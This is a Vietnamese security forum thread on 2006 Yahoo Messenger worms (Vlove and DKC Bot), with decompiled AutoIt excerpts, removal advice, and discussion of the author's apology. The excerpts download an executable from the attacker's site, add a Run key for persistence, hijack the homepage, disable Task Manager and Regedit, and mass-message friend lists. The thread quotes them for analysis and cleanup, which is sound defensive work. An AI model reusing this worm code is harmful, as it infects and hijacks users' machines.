Latest posts for the topic "Một virus qua YIM mới vừa xuất hiện"

Một virus qua YIM mới vừa xuất hiện

mfeng — GMT

Title: Một virus qua YIM mới vừa xuất hiện. Chiều tối nay vừa bật YIM lên đã gặp một loạt thông điệp dạng:

http://fun.nguoiiu.com/life/ Tang ban ne =)) etc...

Đoán 90% là một kiểu YIM worm mới, vì có hành vi rất giống với AutoIt.Gaixinh. Mở theo cái link trên, save được một file exe vlove.exe. Qua phân tích, kết quả cho thấy đây là một dạng "hậu duệ" của Gaixinh :( Có lẽ chú script-kiddies nào mang code gaixinh về sửa đổi. Sau đây là một đoạn code Code:

; 

; ----------------------------------------------------------------------------
; 
; ----------------------------------------------------------------------------

AutoItSetOption ("TrayIconHide","1")
AutoItSetOption ("WinTitleMatchMode", "4")
AutoItWinSetTitle ("MTVCSTART")

While WinExists("MTVCLOVE")
WinClose("MTVCLOVE")
WEnd

AutoItWinSetTitle ("MTVCLOVE")
Sleep(5000)

; Phan chinh
Dim $mess[5]
Dim $dfmess[5]
If Not FileExists(@WindowsDir & "\system32.exe") Then
		InetGet ("http://fun.nguoiiu.com/y/vlove.exe" ,@WindowsDir & "\system32.exe")
		Sleep(10000)
EndIf
; Tao tin nhan

	$dfmess[0] = " http://fun.nguoiiu.com/life/ :D Vui qua ne "
	$dfmess[1] = " http://fun.nguoiiu.com/life/ Truyen cuoi do, vao di =)) "
	$dfmess[2] = " http://fun.nguoiiu.com/life/ Tang ban ne =)) "
	$dfmess[3] = " http://fun.nguoiiu.com/life/ =)) vao day nhe! Chuc vui ve!"
	$dfmess[4] = " http://fun.nguoiiu.com/life/ haaaaa =)) =)) Trui, ngo nghinh wa' *-^"

	InetGet ( "http://files.myopera.com/mtvcfun/files/messenger.txt" ,@TempDir & "\messenger.txt" ,1,1)
...

	RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run","system32","REG_SZ", @WindowsDir & "\system32.exe")
	RegWrite("HKEY_CURRENT_USER\SOFTWARE\microsoft\Internet Explorer\Main", "Start Page", "REG_SZ", "http://fun.nguoiiu.com/life/")
	RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\View\YMSGR_Launchcast","content url","REG_SZ", "http://fun.nguoiiu.com/y/")
	RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\View\YMSGR_buzz","content url","REG_SZ", "http://fun.nguoiiu.com/y/")
...
; ----------------------------------------------------------------------------
; 
; ----------------------------------------------------------------------------

Mình chỉ trích một số đoạn code cho đủ để hiểu cách remove virus này như thế nào. Mô tả sơ lược 1. Các loại thông điệp gửi qua YIM như sau:

http://fun.nguoiiu.com/life/ :D Vui qua ne http://fun.nguoiiu.com/life/ Truyen cuoi do, vao di =)) http://fun.nguoiiu.com/life/ Tang ban ne =)) http://fun.nguoiiu.com/life/ =)) vao day nhe! Chuc vui ve! http://fun.nguoiiu.com/life/ haaaaa =)) =)) Trui, ngo nghinh wa' *-^

2. Virus lấy file từ http://fun.nguoiiu.com/y/vlove.exe, ghi vào %Windows%\system32.exe 3. Tạo key run trong HKCU\Software\Microsoft\Windows\CurrentVersion\Run system32 = %Windows%\system32.exe 4. Đặt lại homepage của IE: HKCU\SOFTWARE\microsoft\Internet Explorer\Main Start Page="http://fun.nguoiiu.com/life/" 5. Sửa key: HKCU\Software\Yahoo\pager\View\YMSGR_Launchcast content url = "http://fun.nguoiiu.com/y" HKCU\Software\Yahoo\pager\View\YMSGR_buzz content url="http://fun.nguoiiu.com/y/" PS: Có thể việc public code gaixinh là nguyên nhân chủ yếu của sự vụ này :(

Một virus qua YIM mới vừa xuất hiện

mfeng — GMT

Tới thời điểm hiện tại (7:40 01-08-2006), host trên đã bị disable:

Xin lỗi tới toàn thể người dùng Internet Việt Nam Đây kô phải là 1 trang giải trí mà là 1 trang chứa virus Webhost này là do tôi cho nhiều người bạn mượn, kô ngờ bị lợi dụng để phân tán virus nếu bạn bị dính trojan này, xin hãy vào bkav.com.vn để cập nhật chương trình quét

Một virus qua YIM mới vừa xuất hiện

vinhphucict — GMT

Không thể có chuyện mượn mõ ở đây!!!!!!!!!!! Bất cẩn đến thế là cùng! Nhưng dù sao thì cũng đã xảy ra, lỗi trên có thể tha thứ! Đã giải mã được rồi thì có thể remove nó đi được. Chú em này sinh 1987 hình như tại Hưng Yên, đang học tại Hà Nội. Bị tóm rồi! Lần sau khi cho ai mượn cần tóm những thằng có tóc!

Một virus qua YIM mới vừa xuất hiện

kara_men — GMT

Xin loi cac ban vi minh da phat tan virus nay! Neu ban bi nhiem ban co the download chuong trinh nay de diet: http://fun.nguoiiu.com/delvlove.exe

Đã bị disable đâu Hôm nay thằng bạn gửi cho cái này. Tò mò nhấn vào thử nhưng có thấy bị nhiễm gì đâu nhỉ?? Chắc tại mọi người không update windows đầy đủ rồi.

Nếu bạn nhận được các đường link http://fun.nguoiiu.com/life/ hoặc http://rev-club.info/life thì đừng vào. 2 trang web này hiện nay đang sử dụng mã độc để khống chế trình duyệt IE, chiếm trang chủ mặc định ( chuyển thành trang nguoiiu.com ), khoá regedit. msconfig ... Xin hãy gửi ngay thông báo này cho càng nhiều người càng tốt

Một virus qua YIM mới vừa xuất hiện

t0ny4n — GMT

Tin mới nè Tác giả virus VLove đến VietNamNet "giải trình" sự việc (VietNamNet) - "Do không lường trước hậu quả và nhận thức không đầy đủ, em đã dại dột tung virus Vlove lên mạng chỉ với mong muốn được nhiều người biết đến website của mình! Em muốn gửi lời xin lỗi đến toàn thể người dùng YM đã bị nhiễm Vlove và mong được tham gia khắc phục hậu quả bằng bất cứ cách nào!"

Nguyễn Đức D. thuật lại với phóng viên VietNamNet về quá trình phát tán Vlove qua YM trong vài ngày qua. Ảnh: Lê Anh Dũng Với thái độ khá thành thực, Nguyễn Đức D. - Sinh năm 1987 - SV năm thứ nhất BachKhoa Aptech (Hà Nội) đã chủ động tự đến tòa soạn VietNamNet, với mong muốn được trình bày các vấn đề liên quan đến việc virus Vlove lây lan qua Yahoo Messenger tại VN trong vài ngày qua, cũng như gửi lời xin lỗi tới những người đã gặp phiền phức do máy tính bị nhiễm virus này. "Đầu tiên, em xin nhờ VietNamNet chuyển lời xin lỗi của em đến tất cả người dùng YahooMessenger đã vô tình bị virus Vlove làm phiền" - D. nói. D. kể lại khá chi tiết, trong đó nói rõ Vlove được D. viết rất đơn giản từ công cụ lập trình AutoIT, được tung lên mạng từ ngày 27/7/2006, lúc đầu tại trang Reved...info. Sau khi trang này bị hết băng thông (vì quá nhiều người cùng lúc truy cập vào), buộc phải tạm ngừng từ ngày 28/7, mãi cho đến chiều tối 31/7/2006 D. mới tung Vlove lên mạng một lần nữa tại domain http://...uoiiu.com. Giải thích về các thông tin trên một số báo cho biết Vlove đã được chuẩn bị kỹ cho việc tấn công với tận 3 phiên bản khác nhau, D. cho rằng hiểu như vậy hơi "nghiêm trọng hoá vấn đề" quá: "Đúng là Vlove có ba phiên bản nhưng gần như giống hệt nhau, chỉ có điểm khác biệt là phiên bản đầu có thời gian gửi tin nhắn hàng loạt tới những người dùng YM khác trong friendlist với chu kỳ 1 phút. Em thấy gửi nhiều tin nhắn YM như thế gây ảnh hưởng nhiều tới người dùng nên sửa lại thành chu kỳ 30 phút. Phiên bản thứ 3 chỉ thay thao tác bôi đen (select) từng nick trong danh sách friendlist của YM trước khi kích chuột phải vào để gửi message hàng loạt thành thao tác Ctrl+A (các thao tác này đều được lập sẵn trong AutoIT) để không mất nhiều thời gian, khắc phục hiện tượng làm chương trình Yahoo Messenger chạy chậm".

Tác giả Vlove (bên trái): "Em muốn qua VietNamNet gửi lời xin lỗi đến toàn thể người dùng YM đã bị nhiễm virus Vlove" . Ảnh: Lê Anh Dũng "Còn lại, tính năng của các phiên bản đều là gửi đường link đến trang web chứa virus, khi người dùng kích vào link, máy tính nào dùng trình duyệt IE (Internet Explorer) thấp hơn phiên bản 7.0 hoặc dùng hệ điều hành từ Windows XP SP1 trở về trước sẽ bị virus tự động cài đặt vào máy. Trường hợp còn lại, người dùng sẽ được hỏi có download file virus có đuôi .exe hay không". D. cho biết: "Ngoài khả năng tự động chiếm địa chỉ trang chủ ngầm định của trình duyệt IE và gửi link tới tất cả các địa chỉ trong friendlist Yahoo của máy tính bị nhiễm, em xin khẳng định mục đích viết virus này của em không hề nhằm phá hoại gì đến người dùng máy tính." D. cho biết thêm, ngay sau khi bạn bè gửi đường link về bài viết VietNamNet cảnh báo người dùng về sự phát tán của Vlove, cậu ta đã nhận ra rằng hành động của mình là rất dại dột và đã chủ động xóa ngay nguồn phát tán virus, viết chương trình xoá bỏ virus đó ra khỏi máy tính và xin lỗi trên website phát tán, chủ động liên hệ với trung tâm BKIS, đồng thời cung cấp mã nguồn và cách thức xóa Vlove... "Tuy nhiên, em không ngờ là nó vẫn lây lan nhanh như thế". "Lúc đưa virus Vlove lên mạng, em chỉ nghĩ đơn giản đó là cách mà một số webmaster vẫn sử dụng để thu hút nhiều người biết đến website của mình, chứ chưa ý thức được rằng việc lợi dụng chương trình Yahoo Messenger để phát tán đường link tới website sẽ gây khó chịu và ảnh hưởng tới người sử dụng như hậu quả thực tế", D. giải thích.

Mới 19 tuổi, đang là sinh viên năm thứ nhất, D. thể hiện rõ sự hối hận và lo lắng khi chương trình Vlove của mình gây ra những tác hại không mong muốn tới cộng đồng Internet tại Việt Nam. Khi chủ động tới toà soạn VietNamNet trình bày sự việc vào chiều 2/8, D. đã phải rủ thêm một người bạn học đi cùng để đỡ ngại". Ảnh: Lê Anh Dũng Một điểm đáng chú ý, tác giả Vlove khẳng định chương trình của mình không hề có khả năng tự động cập nhật các phiên bản mới từ máy người dùng bị nhiễm virus sau mỗi lần khởi động lại máy tính (như trong thông báo phân tích Vlove của BKIS). Trong thông báo này, BKIS cũng khẳng định "cả 3 phiên bản hiện tại của VloveYM không phá hoại hay ăn cắp dữ liệu của người dùng". Tác giả một virus lây qua YM từng bị Bộ Bưu chính Viễn thông xử phạt hành chính 10 triệu đồng cách đây chưa lâu cũng đã chia sẻ với VietNamNet về Vlove: "Em hoàn toàn không biết tác giả Vlove là ai, song cảm thấy thương người này, vì em thấy đây là một bạn trẻ chưa có đủ nhận thức về trách nhiệm những hành vi của mình trên mạng hơn là đáng trách, vì Vlove chưa gây ra hậu quả gì nguy hiểm." Qua vụ việc đáng tiếc của những "dịch virus YM nội" Xrobots hay Vlove, có thể thấy ý thức về bảo mật của đại đa số người dùng Internet tại Việt Nam còn rất thấp, và rất dễ "sập bẫy" với các đường link phát tán qua các chương trình chat như YM. Sự việc cũng gióng lên hồi chuông cảnh tỉnh với nhiều bạn trẻ đã và đang có ý định thử nghiệm, nghiên cứu virus vì nhiều mục đích: Hãy lường trước trách nhiệm của bản thân và hậu quả tới cộng đồng trước mỗi hành động của mình trên Internet. Đừng vì một phút bồng bột, muốn nổi danh mà có những sai lầm đáng tiếc.

Một virus qua YIM mới vừa xuất hiện

Luke — GMT

Code:

While(1) 
sleep(60000)
$title = WinGetTitle("Yahoo! Messenger","")
 $wincheck = WinExists ($title) 
if $wincheck = 1 Then 
$randnun = Random(0,4,1) 
ClipPut($mess[$randnun]) 
BlockInput (1) 
WinActivate($title) 
Send("^m") 
send("{DOWN}") 
send("^{SHIFTDOWN}{END}{SHIFTUP}") 
send("{ENTER}") 
send("^v {ENTER}")
 BlockInput (0)
 EndIf Sleep(1400000) 
WEnd

Nhìn đoạn này, Luke đoán vLove chỉnh lại từ xRobots. Nhưng kinh nghiệm lập trình của vLove khá hơn thằng em của Luke, dù sao thì nó cũng được đào tạo bài bản và già dặn hơn 1 thằng nhóc mới học lập trình được 2 tháng :-)

Một virus qua YIM mới vừa xuất hiện

jamesmr — GMT

light.phoenix wrote:

PS: Có thể việc public code gaixinh là nguyên nhân chủ yếu của sự vụ này :(

phát biểu linh tinh.ai làm nấy chịu ,a làm gì thì a tự chịu trách nhiệm lấy.còn việc post code theo tôi hoàn toàn là tốt,giúp chúng ta học hỏi được nhiều thứ,mà ở việt nam này toàn là dân giấu nghề kiếm được người post code cho xem hơi khó đấy a bạn.

Một virus qua YIM mới vừa xuất hiện

mfeng — GMT

Xin hỏi bạn học hỏi được gì từ đoạn code của xrobot kia? Kĩ năng lập trình mạng chăng? Hay lập trình hệ thống, hooking API, RCE...? Chỉ đơn giản là mấy lệnh script ghi registry, download file và send key không hơn không kém. "Nghề" mà bạn đề cập đơn thuần chỉ có mục đích phá hoại, thích nổi danh mà thôi.

Một virus qua YIM mới vừa xuất hiện

114v — GMT

light.phoenix wrote:

Xin hỏi bạn học hỏi được gì từ đoạn code của xrobot kia? Kĩ năng lập trình mạng chăng? Hay lập trình hệ thống, hooking API, RCE...? Chỉ đơn giản là mấy lệnh script ghi registry, download file và send key không hơn không kém. "Nghề" mà bạn đề cập đơn thuần chỉ có mục đích phá hoại, thích nổi danh mà thôi.

Nếu bạn thích thì bạn sẽ thấy có những cái gì đó :mrgreen:

Một virus qua YIM mới vừa xuất hiện

kaisai — GMT

@light.phoenix . Biết đc phương pháp hoạt động của nó ra sao.Thế khi chưa công bố mã nó bác biết cách diệt nó không.Nếu bác là cao thủ có lẽ bác biết.Và theo em sau khi xem code gaixinh con Vlove diệt đc liền mà.Đấy là cái em nghiệm thu đc.

Một virus qua YIM mới vừa xuất hiện

jamesmr — GMT

light.phoenix wrote:

Xin hỏi bạn học hỏi được gì từ đoạn code của xrobot kia? Kĩ năng lập trình mạng chăng? Hay lập trình hệ thống, hooking API, RCE...? Chỉ đơn giản là mấy lệnh script ghi registry, download file và send key không hơn không kém. .

sao lại là kĩ năng lập trình mạng :?:) ,đối với tui cái gì không biết mà đọc được của người khác thì tôi gọi là học ,đơn giản nhưng mà hiệu quả.

light.phoenix wrote:

"Nghề" mà bạn đề cập đơn thuần chỉ có mục đích phá hoại, thích nổi danh mà thôi.

cái này chắc anh bạn đã từng nhỉ,ba sạo :mrgreen:

Một virus qua YIM mới vừa xuất hiện

Luke — GMT

light.phoenix wrote:

Xin hỏi bạn học hỏi được gì từ đoạn code của xrobot kia? Kĩ năng lập trình mạng chăng? Hay lập trình hệ thống, hooking API, RCE...? Chỉ đơn giản là mấy lệnh script ghi registry, download file và send key không hơn không kém. "Nghề" mà bạn đề cập đơn thuần chỉ có mục đích phá hoại, thích nổi danh mà thôi.

light.phoenix nói thế là quá cực đoan. Theo mình nghĩ sau thời gian này cũng đã có thêm khá nhiều người biết đến AutoIT, một công cụ lập trình nhanh, gọn, gần gũi, và hiệu quả hơn mấy bộ Studio trong khá nhiều trường hợp. Và khả năng học lập trình AutoIT cao hơn nhiều so với Studios. Làm việc cốt hiệu quá chứ không cần quá màu mè hoa lá. Hơn nữa, muốn bảo mật tốt thì phải hiểu về nó. Nếu light.phoenix bảo mật tốt thì cũng phải nghịch ngợm không ít rồi. Cái nguyên lý này tôi nghĩ bạn cũng phải hiều. Nổi danh? Ai cũng có 1 cái uy tín của mình, đó cũng là danh tiếng. Tôi nghĩ bạn cũng sẽ không từ chối cái đó, thậm chí có thể còn thích nữa. Còn việc thích nổi danh theo kiểu này thì cũng cần phải xem xét lại, bởi vì chẳng ai thích mang tai tiếng vào người cả, chưa kể khoản tiền phạt méo mặt nữa chứ. Tuy nhiên có 1 điều: NHIỆT TÌNH + THIẾU HIỂU BIẾT = PHÁ HOẠI + HẬU QUẢ

Một virus qua YIM mới vừa xuất hiện

mfeng — GMT

Hi Luke, Cảm ơn bạn đã đưa ra một số ý kiến và nhận xét sâu sắc.

Hơn nữa, muốn bảo mật tốt thì phải hiểu về nó. Nếu light.phoenix bảo mật tốt thì cũng phải nghịch ngợm không ít rồi. Cái nguyên lý này tôi nghĩ bạn cũng phải hiều.

Mình cũng biết điều này. Muốn bảo vệ được cái gì phải thực sự nắm rõ về nó. Nhưng khái niệm "nghịch ngợm" làm sao không được ảnh hưởng tới người khác. Không phải vô cớ mà rất nhiều exploit code không thể sử dụng ngay theo kiểu nhắm mắt dùng của scriptkiddes. Theo rất nhiều đánh giá, thiệt hại do đám này gây ra không kém gì so với những tay chuyên nghiệp, thậm chí còn hơn.

Nổi danh? Ai cũng có 1 cái uy tín của mình, đó cũng là danh tiếng. Tôi nghĩ bạn cũng sẽ không từ chối cái đó, thậm chí có thể còn thích nữa. Còn việc thích nổi danh theo kiểu này thì cũng cần phải xem xét lại, bởi vì chẳng ai thích mang tai tiếng vào người cả, chưa kể khoản tiền phạt méo mặt nữa chứ. Tuy nhiên có 1 điều: NHIỆT TÌNH + THIẾU HIỂU BIẾT = PHÁ HOẠI + HẬU Q

Con người nói chung thường hướng tới hai mục tiêu: vật chất và danh tiếng. Mình thừa nhận không nằm ngoài quy luật đó. Nhưng để đạt được các điều này bằng mọi cách thì không phải là điều hay. Nổi danh vì trình độ thực sự của bản thân, giúp ích cho cộng đồng luôn được kính trọng và ngưỡng mộ hơn nổi danh vì phá hoại, dù vô tình hay hữu ý. Rega

Một virus qua YIM mới vừa xuất hiện

rankma — GMT

Mình cũng đã bị nhiễm con Virus này, nhưng cũng đã khắc phục được qua những lời chỉ giáo của các bạn. Xin chân thành cảm ơn tất cả mọi người,

Re: Một virus qua YIM mới vừa xuất hiện

ducnamnv — GMT

Thành thật mà nói bác Luke đáng được biểu dương vì tinh thần nâng cao trình độ IT trong cộng đồng. Tui cũng rất may mắn khi thoát đc lần tấn công đầu tiên của gaixinh nhưng k biết làm cách nào giúp bạn bè gỡ nó ra, phải đến khi đọc xong bài của bác Luke tôi mới biết đc và nhắc nhở mọi ng đc chính xác.Nhờ bác luke mà tôi cũng hiểu đc AutoIt là công cụ tốt ntn. Mọi người đều phải chịu trách nhiệm trước những hành vi của mình, việc sử dụng và phát tán VR là do mỗi cá nhân, phải tự chịu & đừng quy kết trách nhiệm cho người khác. Tuy nhiên các bác cho em hỏi là làm thế nào mọi người lại có được code của VR này, nếu mà phân tích được code từ file exe của nó thì chỉ bảo em với

Một virus qua YIM mới vừa xuất hiện

nhutdm — GMT

Trong AutoIt có một công cụ hữu ích decompile *.exe thành script *.au3... Bạn có thể dùng cái đó để có mã nguồn nhưng trong một số trường hợp, coder có thể không cho phép bạn decompile hoặc đặt pass...

Một virus qua YIM mới vừa xuất hiện

Luke — GMT

Thường thì không thể decompile được vì tất cả những ai viết bằng AutoIT đều để chế độ un-decompile Muốn reverse code của nó thì phải dùng đến upx.exe để unpack và tiếp đó là OllyDbg để disassemble nó, tìm phần mã nguồn đã được extract ra trong bộ nhớ Có đầy đủ những gì cần

Một virus qua YIM mới vừa xuất hiện

vista — GMT

Dạo này xuất hiện hàng loạt nhỉ? Cách đây 1 tiếng lại xuất hiện con daokhuc.de

Một virus qua YIM mới vừa xuất hiện

_HITMAN_ — GMT

Chính xác , tui mới bị nhiễm , may là ghost lại rồi , con này nếu bị nhiễm thì tên file được gọi trong lúc khởi động là takmng gì gì đó kho nhớ , vô run gõ msconfig chọn thẻ startup sẻ thấy nó , máy bị nhiễm nó cũng tự gữi đi cái link daokhuc.be cho tất cả mọi người trong list yahoo , nó disable task manager , ngoài ra nó còn thay đổi cả status là những lời yêu đương linh tinh kèm theo là cai link đó nửa . Mọi người cảnh giác !

Một virus qua YIM mới vừa xuất hiện

mfeng — GMT

daokhuc.be ->

... ;-------------------------------------------- ; Tac Gia: Kevin Duong - KVD ; Phan Mem: DKC Bot ; Phien Ban: 1.1 ; Cong Dung: Quang cao Website thong qua Y!M ; Phat Hanh: 1-9-2006 ;-------------------------------------------- ... $website = "http://daokhuc.be" ; Lay Nhiem Vao He Thong If Not FileExists(@WindowsDir & "\taskmng.exe") Then InetGet ($website & "/dkc.exe", @WindowsDir & "\taskmng.exe", 0, 1) Sleep(5000) EndIf ; Ghi Khoa Registry RegWrite("HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel", "Homepage", "REG_DWORD", "1") RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1") RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", "1") RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "Start Page", "REG_SZ", $website) RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\View\YMSGR_buzz", "content url", "REG_SZ", $website) RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\View\YMSGR_Launchcast", "content url", "REG_SZ", $website) RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Task Manager", "REG_SZ", @WindowsDir & "\taskmng.exe") RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "Window Title", "REG_SZ", "Dao Khuc Community :: Chut gi de nho...") ...

Messages:

1. "Nguoi ra di vi anh da mang lam lo hay tai vi anh day qua ngheo? Chang the trao ve em duoc nhu long em luon uoc mo, giac mo giau sang... " 2. "Ngay khong em anh day lam sao cho het ngay? Sang dem duong nhu chi co anh voi anh quay quang... " 3. "Om bau dau thuong, minh anh co don chon day. Ngay mai em ra di, chon giau bao ky niem... " 4. "Dem nay mua ngoai hien, mua oi dung roi them cho xot xa. Anh khong quay ve day, loi nao anh noi da quen... " 5. "Ngay mai thoi doi ta lia xa em con nho? That long anh muon ta nhin thay nhau, cho quen mau cau yeu thuong em voi anh hom nao... " & "Tra lai em niem vui khi duoc gan ben em, tra lai em loi yeu thuong em dem, tra lai em niem tin thang nam qua ta dap xay. Gio day chi la nhung ky niem buon... " 6. "Loi em noi cho tinh chung ta, nhu doan cuoi trong cuon phim buon. Nguoi da den nhu la giac mo roi ra di cho anh bat ngo... " 7. "Tha nguoi dung noi se yeu minh toi mai thoi thi gio day toi se vui hon. Gio nguoi lac loi buoc chan ve noi xa xoi, cay dang chi rieng minh toi... " 8. "Khoc cho nho thuong voi trong long, khoc cho noi sau nhe nhu khong. Bao nhieu yeu thuong nhung ngay qua da tan theo khoi may bay that xa... " 9. "Toi di lang thang lan trong bong toi buot gia, ve dau khi da mat em roi? Ve dau khi bao nhieu mo mong gio da vo tan... Ve dau toi biet di ve dau? "

Một virus qua YIM mới vừa xuất hiện

hung1910 — GMT

KVD wrote:

Trong AutoIt có một công cụ hữu ích decompile *.exe thành script *.au3... Bạn có thể dùng cái đó để có mã nguồn nhưng trong một số trường hợp, coder có thể không cho phép bạn decompile hoặc đặt pass...

Cậu em coi chừng đó, chưa thấy mấy bài học trước hả? :mrgreen:

Một virus qua YIM mới vừa xuất hiện

kara_men — GMT

http://daokhuc.be/ Cái này lây qua lỗi gì vậy?? Sau tui vào mà ko thấy có ảnh hưởng gì?

Một virus qua YIM mới vừa xuất hiện

_HITMAN_ — GMT

Ông cứ chờ 1 hồi thì sẻ biết , nó tự thay đổi status với tự gữi link cho mọi người trong list đó , kiểm tra xem các tin đã gữi coi , vô task manager có được ko ? !

Re: Một virus qua YIM mới vừa xuất hiện

TuanHung91 — GMT

Sao bây giờ lắm Vius lây lan qua Y!M thế nhỉ???? Cũng là đòn cảnh tỉnh cho các người dùng ở Việt Nam!!!!! :)) :))

Re: Một virus qua YIM mới vừa xuất hiện

netprobienhoa — GMT

Đồng chí phoenix cho hỏi làm sao để kill con vius này đây? Con này mới quá, chưa có sòt nào kill dc, có ai chỉ cách kill bằng tay ko?

Re: Một virus qua YIM mới vừa xuất hiện

hung1910 — GMT

Vào registry xoá hết :

RegWrite("HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel", "Homepage", "REG_DWORD", "1") RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1") RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", "1") RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "Start Page", "REG_SZ", $website) RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\View\YMSGR_buzz", "content url", "REG_SZ", $website) RegWrite("HKEY_CURRENT_USER\Software\Yahoo\pager\View\YMSGR_Launchcast", "content url", "REG_SZ", $website) RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Task Manager", "REG_SZ", @WindowsDir & "\taskmng.exe") RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "Window Title", "REG_SZ", "Dao Khuc Community :: Chut gi de nho...")

Một virus qua YIM mới vừa xuất hiện

chaoga — GMT

Mình cũng tình cờ nhấp vào trang daokhuc.be hôm nay và đã bị virus tấn công hết lỗi thoát. anh em có cách nào triệt con virus tình cơ này ko? không những nó send cho hàng loạt people in friendlist, nó có set Home Page cho mình nữa chứ. mình ko dc thâm hỉu về máy tính cho lắm, vào internet options nhưng cái homepage bị disable rồi. ai biết set homepage lại không? chán wá chán wá

Một virus qua YIM mới vừa xuất hiện

_HITMAN_ — GMT

Như bác hung1910 nói , vào registry xoá hết mấy cái khoá đó , hiện giờ thì làm thủ công vậy thôi , tui củng bị nhiễm , may là mới hôm qua tạo file ghost nên bây giờ ghost lại ko sao . Hình như ngoài cái link daokhuc.be thì còn có cái http://minhnhut.be nữa ???

Một virus qua YIM mới vừa xuất hiện

kara_men — GMT

_HITMAN_ wrote:

Ông cứ chờ 1 hồi thì sẻ biết , nó tự thay đổi status với tự gữi link cho mọi người trong list đó , kiểm tra xem các tin đã gữi coi , vô task manager có được ko ? !

Chờ rồi, restart máy cũng ko thấy gì. Lúc load cái trang đó bằng Fire Fox cũng ko thấy mà thử load bằng IE 6 cũng ko thấy gì. Dù sao cũng change pass trước thời hạn luôn rồi.

Một virus qua YIM mới vừa xuất hiện

kara_men — GMT

chaoga wrote:

Mình cũng tình cờ nhấp vào trang daokhuc.be hôm nay và đã bị virus tấn công hết lỗi thoát. anh em có cách nào triệt con virus tình cơ này ko? không những nó send cho hàng loạt people in friendlist, nó có set Home Page cho mình nữa chứ. mình ko dc thâm hỉu về máy tính cho lắm, vào internet options nhưng cái homepage bị disable rồi. ai biết set homepage lại không? chán wá chán wá

Home page Unlock nè. import nó vào nhé. http://www.kellys-korner-xp.com/regs_edits/HomePageUnlock.reg

Một virus qua YIM mới vừa xuất hiện

jamesmr — GMT

chaoga wrote:

Mình cũng tình cờ nhấp vào trang daokhuc.be hôm nay và đã bị virus tấn công hết lỗi thoát. anh em có cách nào triệt con virus tình cơ này ko? không những nó send cho hàng loạt people in friendlist, nó có set Home Page cho mình nữa chứ. mình ko dc thâm hỉu về máy tính cho lắm, vào internet options nhưng cái homepage bị disable rồi. ai biết set homepage lại không? chán wá chán wá

bạn vào đây tôi đã post lên tool để khắc phục tại đây: http://www.htmlforum.net/hvaonline/posts/list/3497.html

Một virus qua YIM mới vừa xuất hiện

babyskill — GMT

Cũng chỉ tại mấy bác mất cảnh giác thui. Nhìu lúc mình không bị nhưng người khác bị cũng phiền nữa cứ 2-3 phút nó lại gửi 1 lần. Nhưng giờ trang web đó die rùi

Re: Một virus qua YIM mới vừa xuất hiện

huynhanhdiep — GMT

Các bác ơi! Em là thành viên mới của HVA forum. Em cũng rất thix tìm hiểu về những con virus lây wa YM này, chỉ để học hỏi thui. Nhưng mà em hầu như ko biết gì về mấy cái này, các bác giúp em nhé. Với lại, cho em hỏi, những con virus kiểu như vậy thì thường có dấu hiệu gì để nhận biết ạ??? Thanx các bác trước nhé.